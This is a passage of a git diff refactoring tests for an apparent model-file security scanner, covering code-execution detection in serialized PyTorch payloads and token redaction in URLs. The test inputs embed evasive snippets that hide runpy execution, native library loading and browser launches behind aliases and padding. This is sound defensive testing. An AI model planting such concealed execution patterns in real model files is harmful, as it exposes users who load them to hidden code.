run('payload.py')\n"), + ) + + def test_scan_model_detects_tail_module_alias_from_prefix_assignment_context(self) -> None: + _assert_runpy_across_gap( + (b"\x00\xffimport runpy\nrp = runpy\n"), (b"def payload():\n return rp.run_path('payload.py')\n") + ) + + def test_scan_model_detects_tail_alias_call_from_prefix_unpack_assignment_context(self) -> None: + _assert_runpy_across_gap( + (b"\x00\xffimport runpy\n(run,) = (runpy.run_path,)\n"), (b"def payload():\n return run('payload.py')\n") + ) + @pytest.mark.parametrize( ("assignment", "call"), [ @@ -12168,64 +11322,10 @@ def test_scan_model_ignores_overwritten_prefix_container_context(self) -> None: assert not any(finding.type == "dangerous_builtin" for finding in findings) - def test_scan_model_detects_tail_call_from_prefix_module_alias_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy\nrp = runpy\n" + filler + b"def payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) - - def test_scan_model_detects_tail_call_from_literal_true_compound_import_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffif True: import runpy as rp\n" - + filler - + b"def payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) - def test_scan_model_detects_tail_one_hop_alias_after_prefix_from_import(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xfffrom runpy import run_path\nrun = run_path\n" - + filler - + b"def payload():\n return run('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) - - def test_scan_model_detects_framed_tail_snippet_with_prefix_alias_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy as rp\n" + filler + b"\x00\xffdef payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b"\x00\xfffrom runpy import run_path\nrun = run_path\n"), + (b"def payload():\n return run('payload.py')\n"), ) def test_scan_model_detects_prefix_alias_call_after_middle_tail_start(self) -> None: @@ -12260,11 +11360,7 @@ def test_scan_model_does_not_hoist_function_local_prefix_import_into_tail_contex b" return rp.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_does_not_use_commented_prefix_import_as_tail_context(self) -> None: detector = JITScriptDetector() @@ -12272,11 +11368,7 @@ def test_scan_model_does_not_use_commented_prefix_import_as_tail_context(self) - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) source = b"\x00\xff# import runpy as rp\n" + filler + b"def payload():\n return rp.run_path('payload.py')\n" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_does_not_parse_docstring_priority_import_as_statement(self) -> None: detector = JITScriptDetector() @@ -12317,11 +11409,7 @@ def test_scan_model_does_not_hoist_prefix_import_from_triple_quoted_string(self) + b"def payload():\n return rp.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_does_not_hoist_prefix_import_after_escaped_triple_quote(self) -> None: detector = JITScriptDetector() @@ -12333,42 +11421,18 @@ def test_scan_model_does_not_hoist_prefix_import_after_escaped_triple_quote(self + b"def payload():\n return rp.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_real_prefix_import_after_single_quoted_triple_marker(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b'\x00\xffmarker = \'"""\'\nimport runpy as rp\n' - + filler - + b"def payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b'\x00\xffmarker = \'"""\'\nimport runpy as rp\n'), + (b"def payload():\n return rp.run_path('payload.py')\n"), ) def test_scan_model_detects_tail_import_after_comment_line_closes_triple_quote(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b'\x00\xfftext = """\n# closes """\nimport runpy as rp\n' - + filler - + b"def payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b'\x00\xfftext = """\n# closes """\nimport runpy as rp\n'), + (b"def payload():\n return rp.run_path('payload.py')\n"), ) def test_scan_model_detects_restored_runpy_execution_after_static_overwrite(self) -> None: @@ -12381,11 +11445,7 @@ def test_scan_model_detects_restored_runpy_execution_after_static_overwrite(self b" return runpy.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_priority_snippets_require_import_boundaries_after_cap(self) -> None: def candidate( @@ -12488,11 +11548,7 @@ def test_scan_model_ignores_binary_framed_top_level_replaced_runpy_execution(sel detector = JITScriptDetector() source = b"\x00\xffimport runpy\nrunpy.run_path = len\nrunpy.run_path([])\n\x00MODEL-FRAMING" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_binary_framed_long_tail_alias_aware_runpy_execution(self) -> None: detector = JITScriptDetector() @@ -12501,11 +11557,7 @@ def test_scan_model_detects_binary_framed_long_tail_alias_aware_runpy_execution( b"\x00\xffdef payload():\n from runpy import run_path as run\n return run('payload.py')\n\x00" + tail ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_ignores_binary_prefixed_replaced_runpy_execution(self) -> None: detector = JITScriptDetector() @@ -12524,21 +11576,13 @@ def test_scan_model_ignores_lossy_decoded_string_literal_runpy_execution(self) - + b"\n return \"runpy.run_path('payload.py')\"\n\x00\xffMODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_ignores_framed_runpy_call_inside_multiline_literal(self) -> None: detector = JITScriptDetector() source = b"\x00\xffimport runpy as rp\npayload = '''\n\x00\xff((rp).run_path)('safe')\n'''\n" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_preserves_raw_runpy_match_after_benign_parsed_snippet(self) -> None: detector = JITScriptDetector() @@ -12551,11 +11595,7 @@ def test_scan_model_preserves_raw_runpy_match_after_benign_parsed_snippet(self) b"runpy.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_binary_framed_webbrowser_and_ctypes_calls(self) -> None: detector = JITScriptDetector() @@ -12619,11 +11659,7 @@ def test_scan_model_detects_binary_framed_webbrowser_and_ctypes_calls(self) -> N b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - patterns = {finding.pattern for finding in findings if finding.type == "code_execution_pattern"} - assert "Web browser launch detected" in patterns - assert "Native library loading detected" in patterns + _assert_jit_browser_and_native_findings(detector, source) def test_scan_model_preserves_dynamic_member_risk_after_conditional_overwrite(self) -> None: detector = JITScriptDetector() @@ -12640,11 +11676,7 @@ def test_scan_model_preserves_dynamic_member_risk_after_conditional_overwrite(se b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - patterns = {finding.pattern for finding in findings if finding.type == "code_execution_pattern"} - assert "Web browser launch detected" in patterns - assert "Native library loading detected" in patterns + _assert_jit_browser_and_native_findings(detector, source) def test_scan_model_keeps_webbrowser_member_overwrites_controller_local(self) -> None: detector = JITScriptDetector() @@ -12658,12 +11690,7 @@ def test_scan_model_keeps_webbrowser_member_overwrites_controller_local(self) -> b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Web browser launch detected") def test_scan_model_keeps_library_loader_member_overwrites_instance_local(self) -> None: detector = JITScriptDetector() @@ -12677,12 +11704,7 @@ def test_scan_model_keeps_library_loader_member_overwrites_instance_local(self) b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Native library loading detected") def test_scan_model_detects_hasattr_ctypes_load_and_local_init_alias(self) -> None: detector = JITScriptDetector() @@ -12711,12 +11733,7 @@ def test_scan_model_detects_hasattr_ctypes_load_and_local_init_alias(self) -> No b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Native library loading detected") def test_scan_model_preserves_dynamic_member_risk_after_reassignment_and_delete(self) -> None: detector = JITScriptDetector() @@ -12746,11 +11763,7 @@ def test_scan_model_preserves_dynamic_member_risk_after_reassignment_and_delete( b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - patterns = {finding.pattern for finding in findings if finding.type == "code_execution_pattern"} - assert "Web browser launch detected" in patterns - assert "Native library loading detected" in patterns + _assert_jit_browser_and_native_findings(detector, source) def test_scan_model_detects_ctypes_cdll_subclass_class_local_initializer_alias(self) -> None: detector = JITScriptDetector() @@ -12765,12 +11778,7 @@ def test_scan_model_detects_ctypes_cdll_subclass_class_local_initializer_alias(s b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Native library loading detected") def test_scan_model_ignores_unreachable_ctypes_cdll_subclass_initializer(self) -> None: detector = JITScriptDetector() @@ -12785,12 +11793,7 @@ def test_scan_model_ignores_unreachable_ctypes_cdll_subclass_initializer(self) - b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Native library loading detected") @pytest.mark.parametrize( ("payload", "expected_pattern"), @@ -12829,12 +11832,7 @@ def test_scan_model_ignores_safe_webbrowser_get_overwrite(self) -> None: b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Web browser launch detected") def test_scan_model_ignores_non_loading_ctypes_subclass_initializers(self) -> None: detector = JITScriptDetector() @@ -12874,12 +11872,7 @@ def test_scan_model_ignores_non_loading_ctypes_subclass_initializers(self) -> No b"\x00MODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Native library loading detected") def test_scan_model_ignores_safe_webbrowser_method_overwrite_and_invalid_libraryloader(self) -> None: detector = JITScriptDetector() @@ -12986,12 +11979,7 @@ def test_scan_model_invalidates_safe_libraryloader_proof_after_member_write(self b" runpy.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_ignores_independent_inert_libraryloader_after_other_rebound(self) -> None: detector = JITScriptDetector() @@ -13004,12 +11992,7 @@ def test_scan_model_ignores_independent_inert_libraryloader_after_other_rebound( b" second.payload.printf(b'x')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Native library loading detected") def test_scan_model_ignores_inert_libraryloader_metadata_assignment(self) -> None: detector = JITScriptDetector() @@ -13021,12 +12004,7 @@ def test_scan_model_ignores_inert_libraryloader_metadata_assignment(self) -> Non b" loader.payload.printf(b'x')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Native library loading detected") def test_scan_model_detects_inert_libraryloader_dlltype_mapping_rebound(self) -> None: detector = JITScriptDetector() @@ -13038,12 +12016,7 @@ def test_scan_model_detects_inert_libraryloader_dlltype_mapping_rebound(self) -> b" loader.payload\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Native library loading detected") @pytest.mark.parametrize( "mutation", @@ -13114,24 +12087,14 @@ def test_scan_model_detects_native_load_after_inert_libraryloader_member_rebound b" alias.payload('/missing')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Native library loading detected") def test_scan_model_detects_late_ctypes_subscript_alias_after_priority_window(self) -> None: detector = JITScriptDetector() padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) source = b"\x00\xfffrom ctypes import cdll\n" + padding + b"cdll['payload']\n" + padding - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Native library loading detected") @pytest.mark.parametrize( ("helper_import", "endpoint"), @@ -13333,12 +12296,7 @@ def test_scan_model_invalidates_state_after_bound_explicit_dunder_callback(self) b" runpy.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") @pytest.mark.parametrize( "source", @@ -13621,3 +12579,58 @@ def test_first_body_statement_segment_bounds_nested_recursion() -> None: candidate = header + b"".join(b" " * (depth + 1) + b"if 1:\n" for depth in range(3000)) + b" " * 3001 + b"x = 1\n" segment = jit_script_module._first_body_statement_segment(candidate, len(header), 0) assert segment is not None + + +def _assert_runpy_across_gap(prefix: bytes, suffix: bytes) -> None: + detector = JITScriptDetector() + filler_line = b"# filler\n" + filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) + source = prefix + filler + suffix + + findings = detector.scan_model(source, "pytorch", "payload.bin") + + assert any( + f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + ) + + +def _assert_jit_scan_pattern(detector: JITScriptDetector, source: bytes, filename: str, pattern: str) -> None: + findings = detector.scan_model(source, "pytorch", filename) + + assert any(finding.type == "code_execution_pattern" and finding.pattern == pattern for finding in findings) + + +def _assert_jit_scan_without_pattern(detector: JITScriptDetector, source: bytes, filename: str, pattern: str) -> None: + findings = detector.scan_model(source, "pytorch", filename) + + assert not any(finding.type == "code_execution_pattern" and finding.pattern == pattern for finding in findings) + + +def _assert_jit_browser_and_native_findings(detector: JITScriptDetector, source: bytes) -> None: + findings = detector.scan_model(source, "pytorch", "payload.bin") + + patterns = {finding.pattern for finding in findings if finding.type == "code_execution_pattern"} + assert "Web browser launch detected" in patterns + assert "Native library loading detected" in patterns + + +def _assert_jit_mapping_update_detection( + middle: bytes, should_detect: bool, case_prefix: bytes, case_suffix: bytes, case_pattern: str +) -> None: + source = case_prefix + middle + case_suffix + + findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") + + detected = any(finding.type == "code_execution_pattern" and finding.pattern == case_pattern for finding in findings) + assert detected is should_detect + + +def _assert_late_prefix_typed_alias(case_alias_source: bytes) -> None: + padding = b"# pad\n" * (jit_script_module._MAX_EMBEDDED_PYTHON_IMPORT_CONTEXT_BYTES // len(b"# pad\n") + 1) + prefix = padding + case_alias_source + + typed_aliases = jit_script_module._typed_import_aliases(prefix) + aliases = jit_script_module._unsafe_typed_member_aliases(prefix, typed_aliases) + + assert typed_aliases["wb"] == "webbrowser" + assert aliases["alias"] == frozenset({("webbrowser", "open", False)}) diff --git a/tests/detectors/test_network_comm_detector.py b/tests/detectors/test_network_comm_detector.py index 9e57efacb..76442da78 100644 --- a/tests/detectors/test_network_comm_detector.py +++ b/tests/detectors/test_network_comm_detector.py @@ -58,6 +58,65 @@ def _pad_python_fence(example: str, target_size: int) -> bytes: return f"```python\n{example}#{'x' * (padding - 2)}\n```\n".encode() +def _assert_live_transfer_alias_detected(mapping_flow: str) -> None: + data = ( + "```python\nimport requests\nfrom PIL import Image\n" + "from transformers import AutoModel, AutoProcessor\n" + "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" + "image = Image.open(requests.get(image_url, stream=True).raw)\n" + "processor = AutoProcessor.from_pretrained('official/model')\n" + "model = AutoModel.from_pretrained('official/model')\n" + f"{mapping_flow}" + "model.generate(**device_inputs)\n```\n" + ).encode() + + findings = NetworkCommDetector().scan(data, "README.md") + + assert any(finding["type"] == "network_library" for finding in findings) + assert any(finding["type"] == "network_function" for finding in findings) + + +def _assert_detached_transfer_alias_allowed(mapping_flow: str) -> None: + data = ( + "```python\nimport requests\nfrom PIL import Image\n" + "from transformers import AutoModel, AutoProcessor\n" + "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" + "image = Image.open(requests.get(image_url, stream=True).raw)\n" + "processor = AutoProcessor.from_pretrained('official/model')\n" + "model = AutoModel.from_pretrained('official/model')\n" + f"{mapping_flow}" + "model.generate(**device_inputs)\n```\n" + ).encode() + + _assert_readme_network_info(data) + + +def _assert_safe_readme_model_flow(model_flow: str) -> None: + data = ( + "```python\nimport requests\nfrom transformers import AutoModel\n" + "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" + f"{model_flow}" + "requests.get(image_url, stream=True)\n```\n" + ).encode() + + findings = NetworkCommDetector().scan(data, "README.md") + + assert findings + assert all(finding["severity"] == "INFO" for finding in findings) + assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + + +def _assert_unproven_readme_model_flow(model_flow: str) -> None: + data = ( + "```python\nimport requests\nfrom transformers import AutoModel\n" + "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n" + f"{model_flow}" + "requests.get(image_url, stream=True)\n```\n" + ).encode() + + _assert_network_library_and_function(data, "README.md") + + class TestNetworkCommDetector: """Test the NetworkCommDetector class.""" @@ -423,10 +482,7 @@ def test_trailing_path_delimiters_do_not_prevent_token_redaction(self) -> None: data = f"https://example.com/path/{path_token},".encode() findings = detector.scan(data, "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/path/," - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/path/,") def test_quoted_path_delimiters_do_not_prevent_token_redaction(self) -> None: """Single-quoted source strings should not keep path tokens raw.""" @@ -435,10 +491,7 @@ def test_quoted_path_delimiters_do_not_prevent_token_redaction(self) -> None: data = f"url='https://example.com/path/{path_token}'".encode() findings = detector.scan(data, "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/path/" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/path/") def test_base64_path_capability_tokens_are_redacted(self) -> None: """Base64/base64url path tokens may contain encoded separators or padding.""" @@ -457,10 +510,7 @@ def test_base64url_path_capability_tokens_with_hyphen_are_redacted(self) -> None path_token = "AbCdEfGhIjKlMnOpQrStUvWxYz123456-_" findings = detector.scan(f"https://example.com/download/{path_token}".encode(), "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download/" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download/") def test_long_base64_path_capability_tokens_use_entropy_not_unique_ratio(self) -> None: """Long signed-CDN style path tokens should still be redacted.""" @@ -491,10 +541,7 @@ def test_dotted_opaque_path_capability_tokens_are_redacted(self) -> None: path_token = "AbCdEfGhIjKlMnOpQrStUvWx.Yz1234567890abcdefGhij.Klmn" findings = detector.scan(f"https://example.com/download/{path_token}".encode(), "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download/" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download/") def test_path_parameter_tokens_are_redacted(self) -> None: """Matrix-style path parameters can carry capability tokens.""" @@ -505,10 +552,7 @@ def test_path_parameter_tokens_are_redacted(self) -> None: f"https://example.com/download;token={path_token}/model.bin".encode(), "metadata.txt", ) - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download;token=/model.bin" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download;token=/model.bin") def test_path_parameter_key_value_parts_are_redacted(self) -> None: """Matrix-style sensitive keys can carry their value in the next part.""" @@ -566,10 +610,7 @@ def test_encoded_path_parameter_tokens_are_redacted(self) -> None: f"https://example.com/download%3Btoken={path_token}/model.bin".encode(), "metadata.txt", ) - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download;token=/model.bin" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download;token=/model.bin") def test_path_parameter_key_tokens_are_redacted(self) -> None: """Matrix parameter names can carry capability tokens too.""" @@ -580,10 +621,7 @@ def test_path_parameter_key_tokens_are_redacted(self) -> None: f"https://example.com/download;{path_token}=1/model.bin".encode(), "metadata.txt", ) - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download;=1/model.bin" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download;=1/model.bin") def test_path_segment_tokens_before_matrix_parameters_are_redacted(self) -> None: """A token segment followed by benign matrix params should still be redacted.""" @@ -594,10 +632,7 @@ def test_path_segment_tokens_before_matrix_parameters_are_redacted(self) -> None f"https://example.com/path/{path_token};v=1/model.bin".encode(), "metadata.txt", ) - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/path/;v=1/model.bin" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/path/;v=1/model.bin") def test_authorization_matrix_assignment_redacts_following_payload(self) -> None: """A scheme-only Authorization parameter must carry redaction to the next matrix field.""" @@ -849,10 +884,7 @@ def test_huggingface_repository_home_ids_are_preserved(self) -> None: repo_id = "Llama-3.1-70B-Instruct" data = f"https://huggingface.co/meta-llama/{repo_id}".encode() - findings = detector.scan(data, "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == f"https://huggingface.co/meta-llama/{repo_id}" + _assert_hf_repository_url(detector, data, repo_id, "https://huggingface.co/meta-llama/") def test_single_segment_huggingface_model_ids_are_preserved(self) -> None: """Single-component public Hugging Face model URLs should stay useful.""" @@ -860,10 +892,7 @@ def test_single_segment_huggingface_model_ids_are_preserved(self) -> None: repo_id = "Llama-3.1-70B-Instruct" data = f"https://huggingface.co/{repo_id}".encode() - findings = detector.scan(data, "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == f"https://huggingface.co/{repo_id}" + _assert_hf_repository_url(detector, data, repo_id, "https://huggingface.co/") def test_huggingface_api_repository_ids_are_preserved(self) -> None: """Hugging Face API paths should keep public repo IDs for audit follow-up.""" @@ -871,10 +900,7 @@ def test_huggingface_api_repository_ids_are_preserved(self) -> None: repo_id = "Llama-3.1-70B-Instruct" data = f"https://huggingface.co/api/models/meta-llama/{repo_id}".encode() - findings = detector.scan(data, "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == f"https://huggingface.co/api/models/meta-llama/{repo_id}" + _assert_hf_repository_url(detector, data, repo_id, "https://huggingface.co/api/models/meta-llama/") @pytest.mark.parametrize("route", ["datasets", "spaces"]) def test_huggingface_prefixed_repository_ids_are_preserved(self, route: str) -> None: @@ -927,10 +953,7 @@ def test_non_public_hex_path_capability_tokens_are_redacted(self) -> None: path_token = "0123456789abcdef0123456789abcdef" findings = detector.scan(f"https://example.com/download/{path_token}".encode(), "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download/" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download/") def test_two_class_high_entropy_path_tokens_are_redacted(self) -> None: """Base32/base36-style bearer tokens may only use lowercase letters and digits.""" @@ -938,10 +961,7 @@ def test_two_class_high_entropy_path_tokens_are_redacted(self) -> None: path_token = "0123456789abcdefghjkmnpqrstvwxyz" findings = detector.scan(f"https://example.com/download/{path_token}/model.bin".encode(), "metadata.txt") - url_finding = next(finding for finding in findings if finding["type"] == "url_detected") - - assert url_finding["url"] == "https://example.com/download//model.bin" - assert path_token not in json.dumps(url_finding, sort_keys=True) + _assert_redacted_path_token(findings, path_token, "https://example.com/download//model.bin") def test_dotted_path_tokens_do_not_leak_as_domain_findings(self) -> None: """Domain-like path tokens should not leak through the later domain detector.""" @@ -949,10 +969,7 @@ def test_dotted_path_tokens_do_not_leak_as_domain_findings(self) -> None: path_token = "0123456789abcdefghjkmnpqrstvwxyz.com" findings = detector.scan(f"https://example.com/download/{path_token}/model.bin".encode(), "metadata.txt") - serialized = json.dumps(findings, sort_keys=True) - - assert "https://example.com/download//model.bin" in serialized - assert path_token not in serialized + _assert_serialized_path_token_isolation(findings, path_token) def test_backtick_wrapped_dotted_path_tokens_do_not_leak_as_domain_findings(self) -> None: """Markdown code delimiters should not hide the URL around a dotted path token.""" @@ -960,10 +977,7 @@ def test_backtick_wrapped_dotted_path_tokens_do_not_leak_as_domain_findings(self path_token = "0123456789abcdefghjkmnpqrstvwxyz.com" findings = detector.scan(f"`https://example.com/download/{path_token}/model.bin`".encode(), "metadata.txt") - serialized = json.dumps(findings, sort_keys=True) - - assert "https://example.com/download//model.bin" in serialized - assert path_token not in serialized + _assert_serialized_path_token_isolation(findings, path_token) def 